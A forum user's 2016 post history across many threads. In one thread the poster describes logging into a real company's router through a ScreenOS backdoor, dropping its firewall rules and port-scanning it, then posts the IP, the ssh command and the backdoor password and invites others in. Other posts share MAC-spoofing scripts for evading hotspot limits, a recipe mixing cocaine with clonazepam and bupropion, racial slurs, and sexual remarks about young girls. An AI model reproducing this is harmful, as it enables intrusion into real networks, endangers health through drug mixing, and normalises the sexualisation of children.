User Controls
Posts by Sophie
-
2016-01-27 at 8:54 PM UTC in What is obectjively the best (sub)forum on niggasinin.spaceVote's below.
-
2016-01-27 at 7:54 PM UTC in Would everyone here be interested in a Bill Krozbylet.net?
lol why? I thought you were my friend
Because you've been a proper asshole to me in the past. That and i don't think you have what it takes to run a forum. -
2016-01-27 at 7:29 PM UTC in I'm boredDrugs.
-
2016-01-27 at 7:26 PM UTC in Would everyone here be interested in a Bill Krozbylet.net?I reconsidered.
-
2016-01-27 at 6:56 PM UTC in Ok guise lets commandeer this network for keks.
inb4 honeypot
Nice job, SWIY.
A word of caution though:
SSH may also log your public key fingerprints fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.
As far as what to do next:
You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the arp table, routing table, dhcp entires. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the arp table with the dhcp table and then find out the mfg of connected devices from their mac addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kinda traffic is going in and out. This is all completely passive - you're not interacting with the network in any way so you shouldnt set off any IDS or anything.
As far as active recon, I don't have any ideas right now.
"get nat"
Didn't give me anything. "get dhcp" told me DHCP server is enableb but:
bgroup0: DHCP server is enabled
Total 0 MACs are queued by DHCP relay.
Truth be told i'm not much of a network engineer, furthermore, ScreenOS has other 'command' conventions that what i'm used to. Also:Get us some more info on the clients, see whats diddling around, what services, oses they like etc
I would but first i'll be looking into some ScrenOS commands some more to actually get the thing to do what i want it to do. Any tips would be welcomed. -
2016-01-27 at 6:36 PM UTC in How to get the most out of you cocaine.Booze is complimetary.
-
2016-01-27 at 6:32 PM UTC in How to get the most out of you cocaine.So today i was bored so i decided to get some coke, coke is rather lack luster and is over in a jiffy so here's what you'll need:
- 1 gram of cocaine 16mg of clonazepan 75mg of bupropion/Wellbutrin.
You start off by crushing all drugs into a fine mist. After doing so you combine them all in a little vial. Shake it up and voila. The buprporpion will make the coke last a little longer and make the comedown more bearable and the clonazepam will take the edge of. Resluth: 10/10 coke that's at least worth the money. Pic related:
-
2016-01-27 at 6:24 PM UTC in Help a brother create a script/program
Here's what I have so far. I can spoof my MAC to a random address with this and I can return it back to the original(but it does require me to enter it in before hand).
#!/bin/bash
hexchars="0123456789ABCDEF"
rndMAC=
origMAC=00:00:00:11:23:11
function help() {
cat << EOF
Usage: $0 [args]
-h, --help - Print this help and exit
-r, --run - Spoof MAC every 55 minutes and connect/login to hotspot
-s, --spoof - Spoof MAC address to a randomly generated address
-u, --unspoof - Return spoofed MAC address to original MAC address
EOF
}
function genMac() {
end=$( for i in {1..10} ; do echo -n ${hexchars:$(( $RANDOM % 16 )):1} ; done | sed -e 's/\(..\)/:\1/g' )
rndMAC=00$end
}
function changeMac() {
MAC="$1"
service network-manager stop
ifconfig wlan0 down
ifconfig wlan0 hw ether $MAC
ifconfig wlan0 up
service network-manager start
}
function run() {
genMac
changeMac $rndMAC
#should automaticall connect due to previous connections
#login is next
#wait 55 minutes
run
echo "TODO"
}
if [ $UID -gt 0 ] ;then
die "RUN AS ROOT NIGGA"
fi
while [ $# -gt 0 ]
do
case "$1" in
"-h"|"--help")
help
die
;;
"-r"|"--run")
run
;;
"-s"|"--spoof")
genMac
changeMac $rndMAC
;;
"-u"|"--unspoof")
changeIface $origMAC
;;
*)
help
die
;;
esac
shift
done
I'll use BurpSuite when signing up for a new session and see what kind of HTTP requests will be needed to be sent. I'm assuming it'll be a GET to receive a cookie, and then one POST with the need parameters(Zipcode and Email address, along with the check of a terms button), although there may be another GET when first requesting a guest session.
As far as the request go, from my searches it looks like cURL is the way to go. Is this correct?
Yeah i'd use curl.
Also:It's 7AM and i've been up all night, so I don't really want to type a bunch of code but fuck it.
By the way, if anyone wants to learn shell scripting and pen testing check outhttps://overthewire.org/wargames/bandit/
do not use ifconfig it is soon to be deprecated.
Highly recommended to use macchanger
run this, or macchanger as a cron job: http://www.unixgeeks.org/security/ne...ix/cron-1.html
[FONT=Trebuchet MS]1. IDGAF (I Don't Give A Fuck) what you do with my code*.[/FONT]
[FONT=Trebuchet MS]2. If you claim my code as your own, you will probably just be embarrassing yourself.[/FONT]
[FONT=Trebuchet MS]* As long as you don't use my code to make gay pronz[/FONT]
#!/bin/sh
# add me to cron job
#released under IDGAF licence
#1. IDGAF (I Don't Give A Fuck) what you do with my code*.
#2. If you claim my code as your own, you will probably just be embarrassing yourself.
#* As long as you don't use my code to make gay pronz.
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root nigga" 1>&2
exit 1
fi
interface="wlan0"
#uses IP as ifconfig is soon to be depricated
old_mac=$(ip link show wlan0 | awk '/link\/ether/ {print $2}')
new_mac=$(dd bs=1 count=5 if=/dev/random 2>/dev/null |hexdump -v -e '/1 "%02X-"';echo -n 00)
echo "($interface) Changing mac [$old_mac] to [$new_mac]\n"
# not the best
ip link set dev $interface down
ip link set dev $interface address $new_mac
ip link set dev $interface up
# better to use
# macchanger -r $interface # fully random mac
# macchanger -e $interface # changes device info, leaves vendor as is.
# macchanger -p $interfaxe # go back to hardware defined value
use curl or curl.
Write a program that does the website part of things, and just call macchanger and all will be good for spectraL
I don't know who you are, but you should should stay, hang out with us, make scripts, pwn noobs that sort of thing. You strike me as a person who enjoyes those types of activities. -
2016-01-27 at 1:23 AM UTC in Would everyone here be interested in a Bill Krozbylet.net?If Bill Krozby is going to be make a website i will make it my mission to fuck his shit up.
-
2016-01-27 at 12:21 AM UTC in Would everyone here be interested in a Bill Krozbylet.net?Bill Krozby as admin, lmao, that'd be the day.
-
2016-01-26 at 12:34 PM UTC in What elements do you find most attractive in a girl?
Lol, no.
Where is Lock?
kinda bummed hes not around. …miss his posts, same with benny vader
Lock has been awol for a while now. -
2016-01-26 at 12:15 PM UTC in Ok guise lets commandeer this network for keks.You may recall my thread on ScreenOS router backdoors. http://niggasin.space/forum/technoph...list-by-sophie If you haven't read it already, you should it's an interesting thread. Anyway i SSH'd into a backdoored router to see if i could do anything interesting, i'm root so i can basically do anything i want. First i dropped all screens(firewall rules) then i was able to portscan the IP in question. Here's the results.
Starting Nmap 6.47
Nmap scan report for rrcs-24-213-214-22.nys.biz.rr.com (24.213.214.22)
Host is up (0.023s latency).
Not shown: 808 enhancemented ports, 189 closed ports
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
8181/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds
The http-proxy service redirects from 24.213.214.22:8080 to 24.213.214.22:8181 which is a login screen, https://24.213.214.22:8181/index.html probably for remote access to the router via HTTPS. Querying the administrative configuration seems to corroborate this.
HTTP Port: 8080, HTTPS Port: 8181
TELNET Port: 23, SSH Port: 22
Manager IP enforced: False
Manager IPs: 0
Address Mask Vsys
---------------------------------------- ---------------------------------------- --------------------
Mail Alert: Off, Mail Server:
E-Mail Address:
E-Mail Traffic Log: Off
Configuration Format: DOS
Device Reset: Enabled
Hardware Reset: Enabled
Admin privilege: read-only (Remote admin has read-only privileges)
Max Failed Admin login attempts: 3
Lock admin accounts on auth failure: On, locking time 3 minutes
HTTP redirect: true
Also note how admin privilege says we should have "read only" privilege, well that would be true if we logged in with a regular admin account but the nature of the backdoor is that you login as sys/root. There's also a number of devices connected to the router as the arp table shows:
usage: 6/1024 miss: 0
always-on-dest: disabled
-----------------------------------------------------------------------------------------
IP Mac VR/Interface State Age Retry PakQue Sess_cnt
-----------------------------------------------------------------------------------------
192.168.55.255 ffffffffffff trust-vr/bgroup0 STS 0 0 1
192.168.55.200 0000aafb5ea6 trust-vr/bgroup0 VLD 693 0 0 0
24.213.214.21 0000ca000003 trust-vr/eth0/0 VLD 666 0 0 9
192.168.55.105 7427eaf334d5 trust-vr/bgroup0 VLD 1180 0 0 2
192.168.55.114 08000f678d32 trust-vr/bgroup0 VLD 494 0 0 2
192.168.55.115 08000f678f4e trust-vr/bgroup0 VLD 313 0 0 2
Now i was wondering, since we own the router and firewall what would be the next logical step in securing the rest of the network? Feel free to SSH into the thing and come have a look.
ssh -l administrator 24.213.214.22
Password: <<< %s(un='%s') = %u
Here's a list of basic commands.
http://www.skullbox.net/screenos-cheat-sheet.php
Here are some more obscure commands including those for displaying all commands available.
http://www.cymru.com/gillsr/document...n-commands.htm -
2016-01-26 at 9:54 AM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
U gay.
Not really i like small tits on little girls. -
2016-01-26 at 9:39 AM UTC in Numerous Ruby on Rails vulns discovered!Not sure, seems like a pretty specific thing to fuzz for i think it's a combination of both. Kind of like how bug bounty hunters go about their testing, in part reverse engineering, in part fuzzing on the basis of what you found while dissecting the code.
-
2016-01-26 at 4:45 AM UTC in Not that I'm a shameless "thanks" whore...
I had 36,000 Thanks on Zoklet, and yet I was the most hated. Go figure.
Lets keep it realistic here and go an order of magnitude down. Nobody had 10k+ thanks, until Iam(Richard Burnish) exploited a bug in the thanks system and people got around 6mil. -
2016-01-26 at 3:54 AM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
HNNNGGGG. Goddamn this is a gorgeous rack. https://eroshare.com/tgrfx5eb
Not really. -
2016-01-26 at 1:55 AM UTC in Wats the most unordinary meat you've ate?
Squirrel
Rabbit
Grouse
Pheasant
alliGAYtor
Kangaroo
Buffalo Testicles
Grasshopper
Groundhog
Snake
Cow tongue
Squid
Octopus
Turtle
Salmon Eggs
Eel
Shark
Swordfish
Can't think of any more at the moment. I love eating exotic meats and I am an active outdoorsman. I really want to eat dog, cat, and horse but I can't find any to eat. When I was in the service there was this dude from South America who loved eating Guinea pig so we kept trying to find one so we could cook it.
Don't kill and eat a cat. I'll be upset with if you do. -
2016-01-25 at 8:37 PM UTC in here's a new forum for you spuds
As I've always said, it's not over until I say it's over. Do you not find it amusing how every single BBS-clone was blasted off the face of the Web, and yet this one is coasting along problem-free? Not even a ripple in the pond. Do you really think that is a coincidence? If you do, I have a golden bridge to sell you cheap.
-
2016-01-25 at 6:01 PM UTC in here's a new forum for you spuds
I completely get that spectral has crazy reasons, but his conclusion is still correct.
Namely, it's over. Let's move on. It's cool to have niggasinspace and do what we do, but having a billion sister sites altogether floating around originating from the same community with ostensibly the same goal makes the original totse look like a bunch of whiney bitches who never grew up.
Knoweldge and freedom are cool, but just go on like one of the chans or something.
Right, honestly though when it comes to the users i prefer people here over the people from the chans. Even though chronophilia is more widely accepted at 8chan and certainly masterchan. I just like our people better. -
2016-01-25 at 5:56 PM UTC in Chiggeddy Check Yaself
"I'm not like them but I can pretend".
I wish I could. Do you catch yourself biting your lips when a loli walks by? I'm super self-conscious. I'd just have to admit it.
I was in a class with mostly girls once and a girl made a joke about prostate massages and I was like "Oh yea, that's awesome" and didn't realize it fast enough to do damage control so the whole room gave me the stinkface look. Haha. Yea…
Kek, you need to work on your mind enhancement. And no, i don't bite my lip either figuratively or literally, i just get happy when i see a really adorable little loli, but you wouldn't be able to tell. My thoughts are only betrayed by my behavior/body when i intend them to. Unless i'm angry, everyone can tell i'm angry when i am lol.